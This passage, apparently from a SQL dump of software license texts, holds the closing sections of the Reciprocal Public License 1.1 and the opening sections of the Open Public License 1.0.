Licensed Software including\nthe nature of the change, the authors of the change, and the date of the change.\nThis documentation must appear both in the Source Code and in a text file\ntitled \"CHANGES\" distributed with the Licensed Software and Your Extensions.\n\nb. Make the Source Code for any Extensions You Deploy available in a timely\nfashion via an Electronic Distribution Mechanism such as FTP or HTTP download.\n\nc. Notify the Licensor of the availability of Source Code to Your Extensions\nin a timely fashion and include in such notice a brief description of the\nExtensions, the distinctive title used, and instructions on how to acquire\nthe Source Code and future updates.\n\nd. Grant Licensor and all third parties a world-wide, non-exclusive, royalty-free\nlicense under any intellectual property rights owned or controlled by You\nto use, reproduce, display, perform, modify, sublicense, and distribute Your\nExtensions, in any form, under the terms of this License.\n\nLICENSE TERMS\n\n1.0 General; Applicability & Definitions. This Reciprocal Public License Version\n1.1 (\"License\") applies to any programs or other works as well as any and\nall updates or maintenance releases of said programs or works (\"Software\")\nnot already covered by this License which the Software copyright holder (\"Licensor\")\nmakes publicly available containing a Notice (hereinafter defined) from the\nLicensor specifying or allowing use or distribution under the terms of this\nLicense. As used in this License and Preamble:\n\n1.1 \"Contributor\" means any person or entity who created or contributed to\nthe creation of an Extension.\n\n1.2 \"Deploy\" means to use, Serve, sublicense or distribute Licensed Software\nother than for Your internal Research and/or Personal Use, and includes without\nlimitation, any and all internal use or distribution of Licensed Software\nwithin Your business or organization other than for Research and/or Personal\nUse, as well as direct or indirect sublicensing or distribution of Licensed\nSoftware by You to any third party in any form or manner.\n\n1.3 \"Derivative Works\" as used in this License is defined under U.S. copyright\nlaw.\n\n1.4 \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data\nsuch as download from an FTP or web site, where such mechanism is publicly\naccessible.\n\n1.5 \"Extensions\" means any Modifications, Derivative Works, or Required Components\nas those terms are defined in this License.\n\n 1.6 \"License\" means this Reciprocal Public License.\n\n1.7 \"Licensed Software\" means any Software licensed pursuant to this License.\nLicensed Software also includes all previous Extensions from any Contributor\nthat You receive.\n\n1.8 \"Licensor\" means the copyright holder of any Software previously uncovered\nby this License who releases the Software under the terms of this License.\n\n1.9 \"Modifications\" means any additions to or deletions from the substance\nor structure of (i) a file or other storage containing Licensed Software,\nor (ii) any new file or storage that contains any part of Licensed Software,\nor (iii) any file or storage which replaces or otherwise alters the original\nfunctionality of Licensed Software at runtime.\n\n 1.10 \"Notice\" means the notice contained in EXHIBIT A.\n\n1.11 \"Personal Use\" means use of Licensed Software by an individual solely\nfor his or her personal, private and non-commercial purposes. An individual\'s\nuse of Licensed Software in his or her capacity as an officer, employee, member,\nindependent contractor or agent of a corporation, business or organization\n(commercial or non-commercial) does not qualify as Personal Use.\n\n1.12 \"Required Components\" means any text, programs, scripts, schema, interface\ndefinitions, control files, or other works created by You which are required\nby a third party of average skill to successfully install and run Licensed\nSoftware containing Your Modifications, or to install and run Your Derivative\nWorks.\n\n1.13 \"Research\" means investigation or experimentation for the purpose of\nunderstanding the nature and limits of the Licensed Software and its potential\nuses.\n\n1.14 \"Serve\" means to deliver Licensed Software and/or Your Extensions by\nmeans of a computer network to one or more computers for purposes of execution\nof Licensed Software and/or Your Extensions.\n\n1.15 \"Software\" means any computer programs or other works as well as any\nupdates or maintenance releases of those programs or works which are distributed\npublicly by Licensor.\n\n1.16 \"Source Code\" means the preferred form for making modifications to the\nLicensed Software and/or Your Extensions, including all modules contained\ntherein, plus any associated text, interface definition files, scripts used\nto control compilation and installation of an executable program or other\ncomponents required by a third party of average skill to build a running version\nof the Licensed Software or Your Extensions.\n\n1.17 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2.0 Acceptance Of License. You are not required to accept this License since\nyou have not signed it, however nothing else grants you permission to use,\ncopy, distribute, modify, or create derivatives of either the Software or\nany Extensions created by a Contributor. These actions are prohibited by law\nif you do not accept this License. Therefore, by performing any of these actions\nYou indicate Your acceptance of this License and Your agreement to be bound\nby all its terms and conditions. IF YOU DO NOT AGREE WITH ALL THE TERMS AND\nCONDITIONS OF THIS LICENSE DO NOT USE, MODIFY, CREATE DERIVATIVES, OR DISTRIBUTE\nTHE SOFTWARE. IF IT IS IMPOSSIBLE FOR YOU TO COMPLY WITH ALL THE TERMS AND\nCONDITIONS OF THIS LICENSE THEN YOU CAN NOT USE, MODIFY, CREATE DERIVATIVES,\nOR DISTRIBUTE THE SOFTWARE.\n\n3.0 Grant of License From Licensor. Subject to the terms and conditions of\nthis License, Licensor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to Licensor\'s intellectual property rights, and any third\nparty intellectual property claims derived from the Licensed Software under\nthis License, to do the following:\n\n3.1 Use, reproduce, modify, display, perform, sublicense and distribute Licensed\nSoftware and Your Extensions in both Source Code form or as an executable\nprogram.\n\n3.2 Create Derivative Works (as that term is defined under U.S. copyright\nlaw) of Licensed Software by adding to or deleting from the substance or structure\nof said Licensed Software.\n\n3.3 Under claims of patents now or hereafter owned or controlled by Licensor,\nto make, use, have made, and/or otherwise dispose of Licensed Software or\nportions thereof, but solely to the extent that any such claim is necessary\nto enable You to make, use, have made, and/or otherwise dispose of Licensed\nSoftware or portions thereof.\n\n3.4 Licensor reserves the right to release new versions of the Software with\ndifferent features, specifications, capabilities, functions, licensing terms,\ngeneral availability or other characteristics. Title, ownership rights, and\nintellectual property rights in and to the Licensed Software shall remain\nin Licensor and/or its Contributors.\n\n4.0 Grant of License From Contributor. By application of the provisions in\nSection 6 below, each Contributor hereby grants You a world-wide, royalty-free,\nnon-exclusive license, subject to said Contributor\'s intellectual property\nrights, and any third party intellectual property claims derived from the\nLicensed Software under this License, to do the following:\n\n4.1 Use, reproduce, modify, display, perform, sublicense and distribute any\nExtensions Deployed by such Contributor or portions thereof, in both Source\nCode form or as an executable program, either on an unmodified basis or as\npart of Derivative Works.\n\n4.2 Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, have made, and/or otherwise dispose of Extensions or portions\nthereof, but solely to the extent that any such claim is necessary to enable\nYou to make, use, have made, and/or otherwise dispose of Contributor\'s Extensions\nor portions thereof.\n\n5.0 Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor or any Contributor except as expressly\nstated herein. Except as expressly stated in Sections 3 and 4, no other patent\nrights, express or implied, are granted herein. Your Extensions may require\nadditional patent licenses from Licensor or Contributors which each may grant\nin its sole discretion. No right is granted to the trademarks of Licensor\nor any Contributor even if such marks are included in the Licensed Software.\nNothing in this License shall be interpreted to prohibit Licensor from licensing\nunder different terms from this License any code that Licensor otherwise would\nhave a right to license.\n\n5.1 You expressly acknowledge and agree that although Licensor and each Contributor\ngrants the licenses to their respective portions of the Licensed Software\nset forth herein, no assurances are provided by Licensor or any Contributor\nthat the Licensed Software does not infringe the patent or other intellectual\nproperty rights of any other entity. Licensor and each Contributor disclaim\nany liability to You for claims brought by any other entity based on infringement\nof intellectual property rights or otherwise. As a condition to exercising\nthe rights and licenses granted hereunder, You hereby assume sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow You to distribute the\nLicensed Software, it is Your responsibility to acquire that license before\ndistributing the Licensed Software.\n\n6.0 Your Obligations And Grants. In consideration of, and as an express condition\nto, the licenses granted to You under this License You hereby agree that any\nModifications, Derivative Works, or Required Components (collectively Extensions)\nthat You create or to which You contribute are governed by the terms of this\nLicense including, without limitation, Section 4. Any Extensions that You\ncreate or to which You contribute must be Deployed under the terms of this\nLicense or a future version of this License released under Section 7. You\nhereby grant to Licensor and all third parties a world-wide, non-exclusive,\nroyalty-free license under those intellectual property rights You own or control\nto use, reproduce, display, perform, modify, create derivatives, sublicense,\nand distribute Your Extensions, in any form. Any Extensions You make and Deploy\nmust have a distinct title so as to readily tell any subsequent user or Contributor\nthat the Extensions are by You. You must include a copy of this License with\nevery copy of the Extensions You distribute. You agree not to offer or impose\nany terms on any Source Code or executable version of the Licensed Software,\nor its Extensions that alter or restrict the applicable version of this License\nor the recipients\' rights hereunder.\n\n6.1 Availability of Source Code. You must make available, under the terms\nof this License, the Source Code of the Licensed Software and any Extensions\nthat You Deploy, either on the same media as You distribute any executable\nor other form of the Licensed Software, or via an Electronic Distribution\nMechanism. The Source Code for any version of Licensed Software, or its Extensions\nthat You Deploy must be made available at the time of Deployment and must\nremain available for as long as You Deploy the Extensions or at least twelve\n(12) months after the date You Deploy, whichever is longer. You are responsible\nfor ensuring that the Source Code version remains available even if the Electronic\nDistribution Mechanism is maintained by a third party. You may not charge\na fee for the Source Code distributed under this Section in excess of Your\nactual cost of duplication and distribution where such duplication and distribution\ninvolve physical media.\n\n6.2 Description of Modifications. You must cause any Modifications that You\ncreate or to which You contribute, to update the file titled \"CHANGES\" distributed\nwith Licensed Software documenting the additions, changes or deletions You\nmade, the authors of such Modifications, and the dates of any such additions,\nchanges or deletions. You must also cause a cross-reference to appear in the\nSource Code at the location of each change. You must include a prominent statement\nthat the Modifications are derived, directly or indirectly, from the Licensed\nSoftware and include the names of the Licensor and any Contributor to the\nLicensed Software in (i) the Source Code and (ii) in any notice displayed\nby the Licensed Software You distribute or in related documentation in which\nYou describe the origin or ownership of the Licensed Software. You may not\nmodify or delete any pre-existing copyright notices, change notices or License\ntext in the Licensed Software.\n\n 6.3 Intellectual Property Matters.\n\na. Third Party Claims. If You have knowledge that a license to a third party\'s\nintellectual property right is required to exercise the rights granted by\nthis License, You must include a text file with the Source Code distribution\ntitled \"LEGAL\" that describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If You obtain\nsuch knowledge after You make any Extensions available as described in Section\n6.1, You shall promptly modify the LEGAL file in all copies You make available\nthereafter and shall take other steps (such as notifying appropriate mailing\nlists or newsgroups) reasonably calculated to inform those who received the\nLicensed Software from You that new knowledge has been obtained.\n\nb. Contributor APIs. If Your Extensions include an application programming\ninterface (\"API\") and You have knowledge of patent licenses that are reasonably\nnecessary to implement that API, You must also include this information in\nthe LEGAL file.\n\nc. Representations. You represent that, except as disclosed pursuant to 6.3(a)\nabove, You believe that any Extensions You distribute are Your original creations\nand that You have sufficient rights to grant the rights conveyed by this License.\n\n 6.4 Required Notices.\n\na. License Text. You must duplicate this License in any documentation You\nprovide along with the Source Code of any Extensions You create or to which\nYou contribute, wherever You describe recipients\' rights relating to Licensed\nSoftware. You must duplicate the notice contained in EXHIBIT A (the \"Notice\")\nin each file of the Source Code of any copy You distribute of the Licensed\nSoftware and Your Extensions. If You create an Extension, You may add Your\nname as a Contributor to the text file titled \"CONTRIB\" distributed with the\nLicensed Software along with a description of the contribution. If it is not\npossible to put the Notice in a particular Source Code file due to its structure,\nthen You must include such Notice in a location (such as a relevant directory\nfile) where a user would be likely to look for such a notice.\n\nb. Source Code Availability. You must notify Licensor within one (1) month\nof the date You initially Deploy of the availability of Source Code to Your\nExtensions and include in such notification the name under which you Deployed\nYour Extensions, a description of the Extensions, and instructions on how\nto acquire the Source Code, including instructions on how to acquire updates\nover time. Should such instructions change you must provide Licensor with\nrevised instructions within one (1) month of the date of change. Should you\nbe unable to notify Licensor directly, you must provide notification by posting\nto appropriate news groups, mailing lists, or web sites where a search engine\nwould reasonably be expected to index them.\n\n6.5 Additional Terms. You may choose to offer, and charge a fee for, warranty,\nsupport, indemnity or liability obligations to one or more recipients of Licensed\nSoftware. However, You may do so only on Your own behalf, and not on behalf\nof the Licensor or any Contributor. You must make it clear that any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Licensor and every Contributor for any liability\nplus attorney fees, costs, and related expenses due to any such action or\nclaim incurred by the Licensor or such Contributor as a result of warranty,\nsupport, indemnity or liability terms You offer.\n\n6.6 Conflicts With Other Licenses. Where any portion of Your Extensions, by\nvirtue of being Derivative Works of another product or similar circumstance,\nfall under the terms of another license, the terms of that license should\nbe honored however You must also make Your Extensions available under this\nLicense. If the terms of this License continue to conflict with the terms\nof the other license you may write the Licensor for permission to resolve\nthe conflict in a fashion that remains consistent with the intent of this\nLicense. Such permission will be granted at the sole discretion of the Licensor.\n\n7.0 Versions of This License. Licensor may publish from time to time revised\nand/or new versions of the License. Once Licensed Software has been published\nunder a particular version of the License, You may always continue to use\nit under the terms of that version. You may also choose to use such Licensed\nSoftware under the terms of any subsequent version of the License published\nby Licensor. No one other than Licensor has the right to modify the terms\napplicable to Licensed Software created under this License.\n\n7.1 If You create or use a modified version of this License, which You may\ndo only in order to apply it to software that is not already Licensed Software\nunder this License, You must rename Your license so that it is not confusingly\nsimilar to this License, and must make it clear that Your license contains\nterms that differ from this License. In so naming Your license, You may not\nuse any trademark of Licensor or of any Contributor. Should Your modifications\nto this License be limited to alteration of EXHIBIT A purely for purposes\nof adjusting the Notice You require of licensees, You may continue to refer\nto Your License as the Reciprocal Public License or simply the RPL.\n\n8.0 Disclaimer of Warranty. LICENSED SOFTWARE IS PROVIDED UNDER THIS LICENSE\nON AN \"AS IS\" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nINCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE LICENSED SOFTWARE IS FREE\nOF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING.\nFURTHER THERE IS NO WARRANTY MADE AND ALL IMPLIED WARRANTIES ARE DISCLAIMED\nTHAT THE LICENSED SOFTWARE MEETS OR COMPLIES WITH ANY DESCRIPTION OF PERFORMANCE\nOR OPERATION, SAID COMPATIBILITY AND SUITABILITY BEING YOUR RESPONSIBILITY.\nLICENSOR DISCLAIMS ANY WARRANTY, IMPLIED OR EXPRESSED, THAT ANY CONTRIBUTOR\'S\nEXTENSIONS MEET ANY STANDARD OF COMPATIBILITY OR DESCRIPTION OF PERFORMANCE.\nTHE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LICENSED SOFTWARE\nIS WITH YOU. SHOULD LICENSED SOFTWARE PROVE DEFECTIVE IN ANY RESPECT, YOU\n(AND NOT THE LICENSOR OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. UNDER THE TERMS OF THIS LICENSOR WILL NOT\nSUPPORT THIS SOFTWARE AND IS UNDER NO OBLIGATION TO ISSUE UPDATES TO THIS\nSOFTWARE. LICENSOR HAS NO KNOWLEDGE OF ERRANT CODE OR VIRUS IN THIS SOFTWARE,\nBUT DOES NOT WARRANT THAT THE SOFTWARE IS FREE FROM SUCH ERRORS OR VIRUSES.\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO USE OF LICENSED SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n9.0 Limitation of Liability. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR,\nANY CONTRIBUTOR, OR ANY DISTRIBUTOR OF LICENSED SOFTWARE, OR ANY SUPPLIER\nOF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n10.0 High Risk Activities. THE LICENSED SOFTWARE IS NOT FAULT-TOLERANT AND\nIS NOT DESIGNED, MANUFACTURED, OR INTENDED FOR USE OR DISTRIBUTION AS ON-LINE\nCONTROL EQUIPMENT IN HAZARDOUS ENVIRONMENTS REQUIRING FAIL-SAFE PERFORMANCE,\nSUCH AS IN THE OPERATION OF NUCLEAR FACILITIES, AIRCRAFT NAVIGATION OR COMMUNICATIONS\nSYSTEMS, AIR TRAFFIC CONTROL, DIRECT LIFE SUPPORT MACHINES, OR WEAPONS SYSTEMS,\nIN WHICH THE FAILURE OF THE LICENSED SOFTWARE COULD LEAD DIRECTLY TO DEATH,\nPERSONAL INJURY, OR SEVERE PHYSICAL OR ENVIRONMENTAL DAMAGE (\"HIGH RISK ACTIVITIES\").\nLICENSOR AND CONTRIBUTORS SPECIFICALLY DISCLAIM ANY EXPRESS OR IMPLIED WARRANTY\nOF FITNESS FOR HIGH RISK ACTIVITIES.\n\n11.0 Responsibility for Claims. As between Licensor and Contributors, each\nparty is responsible for claims and damages arising, directly or indirectly,\nout of its utilization of rights under this License which specifically disclaims\nwarranties and limits any liability of the Licensor. This paragraph is to\nbe used in conjunction with and controlled by the Disclaimer Of Warranties\nof Section 8, the Limitation Of Damages in Section 9, and the disclaimer against\nuse for High Risk Activities in Section 10. The Licensor has thereby disclaimed\nall warranties and limited any damages that it is or may be liable for. You\nagree to work with Licensor and Contributors to distribute such responsibility\non an equitable basis consistent with the terms of this License including\nSections 8, 9, and 10. Nothing herein is intended or shall be deemed to constitute\nany admission of liability.\n\n12.0 Termination. This License and all rights granted hereunder will terminate\nimmediately in the event of the circumstances described in Section 13.6 or\nif applicable law prohibits or restricts You from fully and or specifically\ncomplying with Sections 3, 4 and/or 6, or prevents the enforceability of any\nof those Sections, and You must immediately discontinue any use of Licensed\nSoftware.\n\n12.1 Automatic Termination Upon Breach. This License and the rights granted\nhereunder will terminate automatically if You fail to comply with the terms\nherein and fail to cure such breach within thirty (30) days of becoming aware\nof the breach. All sublicenses to the Licensed Software that are properly\ngranted shall survive any termination of this License. Provisions that, by\ntheir nature, must remain in effect beyond the termination of this License,\nshall survive.\n\n12.2 Termination Upon Assertion of Patent Infringement. If You initiate litigation\nby asserting a patent infringement claim (excluding declaratory judgment actions)\nagainst Licensor or a Contributor (Licensor or Contributor against whom You\nfile such an action is referred to herein as \"Respondent\") alleging that Licensed\nSoftware directly or indirectly infringes any patent, then any and all rights\ngranted by such Respondent to You under Sections 3 or 4 of this License shall\nterminate prospectively upon sixty (60) days notice from Respondent (the \"Notice\nPeriod\") unless within that Notice Period You either agree in writing (i)\nto pay Respondent a mutually agreeable reasonably royalty for Your past or\nfuture use of Licensed Software made by such Respondent, or (ii) withdraw\nYour litigation claim with respect to Licensed Software against such Respondent.\nIf within said Notice Period a reasonable royalty and payment arrangement\nare not mutually agreed upon in writing by the parties or the litigation claim\nis not withdrawn, the rights granted by Licensor to You under Sections 3 and\n4 automatically terminate at the expiration of said Notice Period.\n\n12.3 Reasonable Value of This License. If You assert a patent infringement\nclaim against Respondent alleging that Licensed Software directly or indirectly\ninfringes any patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by said Respondent under Sections 3 and 4 shall\nbe taken into account in determining the amount or value of any payment or\nlicense.\n\n12.4 No Retroactive Effect of Termination. In the event of termination under\nthis Section all end user license agreements (excluding licenses to distributors\nand resellers) that have been validly granted by You or any distributor hereunder\nprior to termination shall survive termination.\n\n 13.0 Miscellaneous.\n\n13.1 U.S. Government End Users. The Licensed Software is a \"commercial item,\"\nas that term is defined in 48 C.F.R. 2.101 (Oct. 1995), consisting of \"commercial\ncomputer software\" and \"commercial computer software documentation,\" as such\nterms are used in 48 C.F.R. 12.212 (Sept. 1995). Consistent with 48 C.F.R.\n12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4 (June 1995), all U.S. Government\nEnd Users acquire Licensed Software with only those rights set forth herein.\n\n13.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture, or any other form of legal association\nbetween or among You, Licensor, or any Contributor, and You will not represent\nto the contrary, whether expressly, by implication, appearance, or otherwise.\n\n13.3 Independent Development. Nothing in this License will impair Licensor\'s\nright to acquire, license, develop, subcontract, market, or distribute technology\nor products that perform the same or similar functions as, or otherwise compete\nwith, Extensions that You may develop, produce, market, or distribute.\n\n13.4 Consent To Breach Not Waiver. Failure by Licensor or Contributor to enforce\nany provision of this License will not be deemed a waiver of future enforcement\nof that or any other provision.\n\n13.5 Severability. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n13.6 Inability to Comply Due to Statute or Regulation. If it is impossible\nfor You to comply with any of the terms of this License with respect to some\nor all of the Licensed Software due to statute, judicial order, or regulation,\nthen You cannot use, modify, or distribute the software.\n\n13.7 Export Restrictions. You may be restricted with respect to downloading\nor otherwise acquiring, exporting, or reexporting the Licensed Software or\nany underlying information or technology by United States and other applicable\nlaws and regulations. By downloading or by otherwise obtaining the Licensed\nSoftware, You are agreeing to be responsible for compliance with all applicable\nlaws and regulations.\n\n13.8 Arbitration, Jurisdiction & Venue. This License shall be governed by\nColorado law provisions (except to the extent applicable law, if any, provides\notherwise), excluding its conflict-of-law provisions. You expressly agree\nthat any dispute relating to this License shall be submitted to binding arbitration\nunder the rules then prevailing of the American Arbitration Association. You\nfurther agree that Adams County, Colorado USA is proper venue and grant such\narbitration proceeding jurisdiction as may be appropriate for purposes of\nresolving any dispute under this License. Judgement upon any award made in\narbitration may be entered and enforced in any court of competent jurisdiction.\nThe arbitrator shall award attorney\'s fees and costs of arbitration to the\nprevailing party. Should either party find it necessary to enforce its arbitration\naward or seek specific performance of such award in a civil court of competent\njurisdiction, the prevailing party shall be entitled to reasonable attorney\'s\nfees and costs. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded. You and Licensor\nexpressly waive any rights to a jury trial in any litigation concerning Licensed\nSoftware or this License. Any law or regulation that provides that the language\nof a contract shall be construed against the drafter shall not apply to this\nLicense.\n\n13.9 Entire Agreement. This License constitutes the entire agreement between\nthe parties with respect to the subject matter hereof. EXHIBIT A\n\nThe Notice below must appear in each file of the Source Code of any copy You\ndistribute of the Licensed Software or any Extensions thereto, except as may\nbe modified as allowed under the terms of Section 7.1\n\nCopyright (C) 1999-2002 Technical Pursuit Inc., All Rights Reserved. Patent\nPending, Technical Pursuit Inc.\n\nUnless explicitly acquired and licensed from Licensor under the Technical\nPursuit License (\"TPL\") Version 1.0 or greater, the contents of this file\nare subject to the Reciprocal Public License (\"RPL\") Version 1.1, or subsequent\nversions as allowed by the RPL, and You may not copy or use this file in either\nsource code or executable form, except in compliance with the terms and conditions\nof the RPL.\n\nYou may obtain a copy of both the TPL and the RPL (the \"Licenses\") from Technical\nPursuit Inc. at http://www.technicalpursuit.com.\n\nAll software distributed under the Licenses is provided strictly on an \"AS\nIS\" basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, AND TECHNICAL\nPURSUIT INC. HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION,\nANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET\nENJOYMENT, OR NON-INFRINGEMENT. See the Licenses for specific language governing\nrights and limitations under the Licenses.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(313,'OPL-1.0','OPEN PUBLIC LICENSE\n\nVersion 1.0\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work, which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.8. \"License\" means this document and the corresponding addendum described\nin section 6.4 below.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. \"You\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, \"You\'\' includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\'\' means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n 1.13 \"License Author\" means Lutris Technologies, Inc.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na worldwide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims:\n\n(a) under intellectual property rights (other than patent or trademark) to\nuse, reproduce, modify, display, perform, sublicense and distribute the Original\nCode (or portions thereof) with or without Modifications, or as part of a\nLarger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (``offer to sell and import\'\') the Original\nCode (or portions thereof), but solely to the extent that any such patent\nis reasonably necessary to enable You to Utilize the Original Code (or portions\nthereof) and not to any greater extent that may be necessary to Utilize further\nModifications or combinations.\n\n2.2. Contributor Grant. Each Contributor hereby grants You a worldwide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) to\nuse, reproduce, modify, display, perform, sublicense and distribute the Modifications\ncreated by such Contributor (or portions thereof) either on an unmodified\nbasis, with other Modifications, as Covered Code or as part of a Larger Work;\nand\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nto make, have made, use and sell (``offer to sell and import\'\') the Contributor\nVersion (or portions thereof), but solely to the extent that any such patent\nis reasonably necessary to enable You to Utilize the Contributor Version (or\nportions thereof), and not to any greater extent that may be necessary to\nUtilize further Modifications or combinations\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available, prior to any use, except for\ninternal development and practice, in Source Code form under the terms of\nthis License either on the same media as an Executable version or via an accepted\nElectronic Distribution Mechanism to anyone to whom you made an Executable\nversion available; and if made available via Electronic Distribution Mechanism,\nmust remain available for at least twelve (12) months after the date it initially\nbecame available, or at least six (6) months after a subsequent version of\nthat particular Modification has been made available to such recipients. You\nshall notify the Initial Developer of the Modification and the location of\nthe Source Code via the contact means provided for in the Developer Specific\nlicense. Initial Developer will be acting as maintainer of the Source Code\nand may provide an Electronic Distribution mechanism for the Modification\nto be made available.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nyou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(a) Third Party Claims. If You have knowledge that a party claims an intellectual\nproperty right in particular functionality or code (or its utilization under\nthis License), you must include a text file with the source code distribution\ntitled \"LEGAL\" which describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after You make Your Modification available as described in\nSection 3.2, You shall promptly modify the LEGAL file in all copies You make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Covered Code that new knowledge has been obtained.\n\n(b) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code, and this License in any documentation for the Source\nCode, where You describe recipients\' rights relating to Covered Code. If You\ncreated one or more Modification(s), You may add your name as a Contributor\nto the notice described in Exhibit A. If it is not possible to put such notice\nin a particular Source Code file due to its structure, then you must include\nsuch notice in a location (such as a relevant 